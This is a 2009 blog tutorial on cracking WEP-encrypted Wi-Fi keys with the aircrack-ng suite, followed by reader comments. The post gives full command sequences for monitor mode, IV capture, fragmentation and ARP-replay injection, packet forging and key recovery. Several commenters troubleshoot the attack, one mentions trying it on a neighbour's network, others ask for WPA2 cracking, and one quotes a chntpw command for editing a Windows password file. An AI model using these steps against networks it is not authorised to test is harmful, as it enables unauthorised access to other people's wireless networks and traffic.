WEP Wireless Hacking
by Josh Houston on Mar.25, 2009, under Hacking, Security, Wireless
In this Video Tutorial, I show you how to crack a wireless network secured with WEP encryption. Although it may sound hard, it is actually quite easier than you may think. I also have provided a Written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) providing hosting for the videos. Video 1. Video 2.
- Type in “airmon-ng” to see wireless adaptors on your computer.
- You should see a listing come up. Mine showed wlan0. Yours may be different, such a rausb0.
Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0” with whatever yours showed to be. This will create a new “virtual” device, and will show the name. The name for mine was “mon0“ - Open a new terminal window, and type “airodump mon0” again, replacing “mon0” with your new virtual devices name.
You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C will cancel the current program running in terminal. The name of the networks found is under the ESSID column. You may not see anything there, which is fine, some of them are invisible. FUSiON is the name of my network, so I went over to the BSSID column, and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I could recommend copying it, or writing it down. Also take note of what channel it is on. - This is what I typed after that, “airodump-ng –bssid 00:23:69:18:E4:7D –channel 6 –ivs -w FUSiON mon0” This is all real easy stuff, so I’ll just explain it to you right quick. airodump-ng is the program that captures what is called IVs, the primary component in cracking WEP networks. Here goes!
- Type “airodump-ng”
- Add a space and type “–bssid 00:23:69:18:E4:7D” replacing the address with the address of your Network. This “flag” says we only want to see this address, and nothing else.
- Add a space and type “–channel 6″ replacing the number 6 with the number of the channel of your Network (although 6 is VERY common, so don’t be surprised if that is it)
- Add a space and type “–ivs” This command only captures IVs, which will make cracking the password faster.
- Add a space and type “-w FUSiON” replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network, because it helps me remember easier.
- The “mon0″ at the end, simply defines which device to use.
- Open a New Terminal Window. In it, type “aireplay-ng -5 -b 00:23:69:18:E4:7D mon0″
- aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn’t be possible to crack most WEP networks.
- The “-5″ flag is one method, and the most common, that is used to generate the IVs.
- The “-b 00:23:69:18:E4:7D” tells which address to attack. The -b stands for bssid which is the address of your network. So you will have to replace 00:23:69:18:E4:7D with the address of your network (the one that I recommended you write down or copy earlier).
- The “mon0″ at the end, again just defines which device to use.
- Wait and Press “Y” for yes, when it asks if you would like to use the selected frame.
- This process may have to be repeated until you have a resulting fragment file. It will say when you do. Additionally, you can run this command “aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0″ to help assist with getting a fragment file. Again, make sure to replace my address, with your own.
- Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
“packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy”
Let me break this down for you.- packetforge-ng is the program which will build the arp file, as I like to call it, which you will soon see.
- Add a space, and follow it with “-0 -a 00:23:69:18:E4:7D” and of course, replace it with your own network address.
- Add a space, and type in “-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255″ This part of the command is pretty universal, rarely is it changed. So we won’t go into detail on it here.
- Add a space, and type in “-y fragment-XXXX-XXXXXX.xor”, replacing your fragment file, place of this one, as well.
- And lastly, type in “-w arpy” just the -w is important. The arpy can be anything you can remember. It’s something I’ve just always used, cuz it’s easy for me to remember.
- If all goes well, it Successfully built our Arp Packet.
- Almost Done! “aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0″ is our next command.
- aireplay-ng, like before, should get those IVs flowing in. At an average, I see about 500 IVs/Second. Which isn’t too bad. But some cards do better than others, so you may have better, or worse luck.
- -r arpy is a flag that tells aireplay-ng to play the arp file we created called arpy.
- Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
- If all went well, we are gathering IVs! Open the airodump-ng terminal window that we’ve had open, and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend you getting at least 100,000 IVs, I’ve never waited that long. I’ve cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumilated.
- Once you have at least 40,000, we can start cracking the WEP Password!
- This step, has to be the simplest.
- Open a new Terminal window, and type “aircrack-ng XXXX-01.ivs” replacing the XXXX with what you used when you first started the airodump-ng command.
- Depending on the speed of your computer, you will soon have the WEP Key Decrypted. Just make sure to remove the colons “:” before confirming the Key.
There we go, that is my tutorial on basic WEP cracking. Any Questions, Comments, or Suggestions are GREATLY appreciated!
May 16th, 2009 on 3:58 pm
I changed my Mac address to 00:11:22:33:44:55 following your tutorial and don’t know what my previous mac address was. Do I need to change it back?
I cannot connect to the internet in BT4 right now and am not sure what I need to do to undo what I have done so that I can connect. I am connected to my network but it is unable to pull any web pages.
THanks for the great tutorial I successfully cracked my own wep but now cant even use it.
May 19th, 2009 on 10:13 am
hey josh im just startin hcking and i am trying to crack my wep, im using vmware workstation to run bt4 beta and when i open a terminal window and write down airmon-ng it wont find any wireless adaptor even though when i go back to my windows desktop im connectedd could you help me out thnkss!!!!!
May 19th, 2009 on 10:18 am
JT, you don’t have to change your mac address. A simple restart should restore your mac to the original.
May 19th, 2009 on 10:22 am
Bert, i do not use workstation, I use the VMWare Server. There should be somewhere that you assign a USB device to the Virtual OS. I will see if I cannot find some information for you soon.
June 7th, 2009 on 1:04 pm
Bert, You cannot use an internal device with BT in VM ware. You will need to get a external usb wireless device in order for BT VM to work properly.
Regards,
-Chrisso
June 17th, 2009 on 9:06 am
what do you need, other than backtrack 4, in order for this to work. i downloaded backtrack 3 previously before, but the program won’t run.
June 27th, 2009 on 7:11 am
hi …i ve many q
1-if my network names is S WIFI how should i write it in the terminal>>
2-when i run airodump-ng –bssid 00:23:69:18:E4:7D –channel 6 –ivs -w S WIFI mon0
Invalid output format: IVS and PCAP format cannot be used together.
3-#aireplay-ng -5 -b 00:1E:40:14:E7:8F mon0
No source MAC (-h) specified. Using the device MAC (00:13:02:31:6D:F8)
16:07:31 Waiting for beacon frame (BSSID: 00:1E:40:14:E7:8F) on channel 6
16:07:31 mon0 is on channel 6, but the AP uses channel 11
July 1st, 2009 on 4:48 am
that’s a great tut man.. i really appreciate it ..
July 17th, 2009 on 3:46 pm
Are you going to produce a WPA cracking tutorial? I loved the WEP ones. I would like to see how strong my personal WPA AP’s are.
Thanks!
July 28th, 2009 on 6:28 pm
This may be a dumb question: I used the BT3 final iso on VMWare Workstation and I was able to see the whole linux os where I could open terminals and everything worked fine. When I do the same with the BT4 pre final iso all I get is a terminal screen, so I cant browse or see the desktop or anything? Anyone know why this is?
July 28th, 2009 on 6:42 pm
Figured it out… in case anyone has the same problem type in startx
August 14th, 2009 on 3:34 am
Hello sir,
Your tutorial was very crisp, clear and brilliant.
Thanks a lot for ur hardwork in bringing up this website and for ur helping mind.
Thankyou
mi2
August 14th, 2009 on 10:05 am
Hello sir,
I have a problem with the 3rd command that is “airodump mon0″ it says bad file name or something.. but my virtual device name is mon0 i saw that in brackets.
plz help me…!!!
August 14th, 2009 on 9:03 pm
Hello sir, I am done with the above problem.. that is instead of mon0 i just put in wlan0 .. but i have another problem with the 4th command.. i get an error msg saying that ivs and pcap cannot be compiled together.. plz help.. if you could post your yahoo or hotmail instant messenger id , it would help us a lot.
Thankyou
August 17th, 2009 on 9:49 pm
Hey. When I type the airodump-ng -bssid 00:1C:F0.etc. then channel and ivs and -w and network name. when I hit enter it says invalid option ‘I’. Or it says did you mean –bssid. What is going wrong?
August 19th, 2009 on 6:38 am
Hey you can also use KISMET, and jp-wepcrack as well.
What do you think about using kismet?
August 19th, 2009 on 6:39 am
What do you think about using Kismet, and jc-wepcrack?
I have used them before.
August 31st, 2009 on 2:05 pm
hi josh.
this is only for mac right i have windows.. how can i do that??
please
September 8th, 2009 on 7:02 pm
hi josh.
when i tab: aireplay-ng -5 FF:FF:FF:FF:FF:FF mon0 and then i tab “y”, i doesn’t appear the same that ur video, and then the konsole ask if i want so try another package and i did that about 10 times and it was the same. What else i can do??
September 17th, 2009 on 12:52 am
I was under the impression you said there was a copy of the video available to download to this site. I know it’s late and I’ve done been out of coffee, but I am missing it. I wanted to download/archive it to share with a friend, you never know when good stuff like this gets taken down.
October 19th, 2009 on 4:44 am
hi josh, first of all, impressive work i must add. i tried what you said in the tutorial but i met a problem while looking for fragments. it keeps saying not enough acks or trying LLC NULL packets, and it keeps asking me to change packets(use this packet?y). what is the problem and how can i solve this. i await your reply. tx.
October 25th, 2009 on 6:47 pm
Hey there Josh..
On step 7, after I write
aireplay-ng -1 1 -a MY_AP_MAC mon0
It displays that the association was successful, but the command on step 5-6 starts failing with:
Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
So the packet/IVs recollection fails..
A little help here please.
thanks
November 2nd, 2009 on 11:41 am
My Apologies. I said the videos were available for download, yet the links were never provided.
I have fixed this and the links are now at the top of the entry.
Thanks!
Josh Houston~
December 5th, 2009 on 5:44 pm
for those of you who are having the issue with ivs and pcap cannot be compiled together instead of using “-ivs” type “-output-format ivs” that’ll give you the same results and fix the issue.. happy hacking.
December 27th, 2009 on 12:15 am
How do I know what I should change “hda1″ to in the line Type in “chntpw -i /mnt/hda1/Windows/system32/config/SAM”
January 2nd, 2010 on 8:40 pm
After following the tutorial I get stuck on producing enough Data through sending the arp packets. I know you said something about mac filtering. Do you think this means there is mac filtering enabled?
January 10th, 2010 on 3:48 pm
hi josh it was n impressive tutorial.
i hv got some queries –
1.)it says – ivs and pcap format cannot be used together
2.)after executing airmon-ng start wlan0 in your video , under the driver heading it shows [phy1],but mine shows [phy0] .so what difference it makes.
i’ll be thankful if u help me out.
January 25th, 2010 on 1:30 pm
Hello, your tutorial is very best !
But i have a problem in step 9, the terminal says error with the -0, and the tuto don’t work with all wifi beacause i try on the wifi of my neighbourg and this don’t work, but why is the answer for my problem please ?
Sorry for my bad englis but i’m french.
Thank you
February 6th, 2010 on 1:06 pm
Can you help me how to hack a WPA2 password…..Thanks in advance
April 5th, 2010 on 12:52 am
Dear Josh,
I have to admit this was my first video tutorial that it was really well done and explained.Thanks a lot!!!
Do you planning to throw another video tutorial for wpa2 as well?
April 14th, 2010 on 1:22 pm
sir only one questions i look at the diver compatible list which you provided in video link .but still i cannot figure out about (TP-link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G) is it contemptible or not please be clear
April 14th, 2010 on 1:23 pm
sorry i`m using the back track 4
April 14th, 2010 on 1:27 pm
could you please also tell me about the (TP-Link TL-WN321G) device compatibility please
June 6th, 2010 on 2:56 am
Thank you so much for making this tutorial Josh. I have been working on a school project at computer science in wi-fi security and have been using your guide to understand how and why it is possible to crack WEP. Give yourself a pad on the shoulder mate, it’s an excellent tutorial
June 7th, 2010 on 12:31 am
I Will have to come back again when my class load lets up – however I am taking your RSS feed so I can read your site offline. Thanks.
July 5th, 2010 on 8:08 pm
Hello Josh.
Thank you for such a well thought out tutorial that helps all of us n00bs learn this stuff since most of us are either just getting into linux/ubuntu or wifi security.
I am having difficulty when I attempt to build the arp packet. I get an error about the mac address. I can only assume this has to do with the 00:11:22:33:44:55 mac I typed in that command and might need to be replaced if the AP is using mac filtering and will have to use a mac address I have authorized to access my network.
Does that sound like it may be the problem?
Thanks
September 20th, 2010 on 4:25 am
Hi Josh!!!,
I did what you said on the tutorial but my problem is when is comes to “aireplay-ng” i cannot save the packet..
its says Sending fragmented packet
No answer, repeating…
Trying a LLC NULL packet
Sending fragmented packet
No answer, repeating…
what is the problem here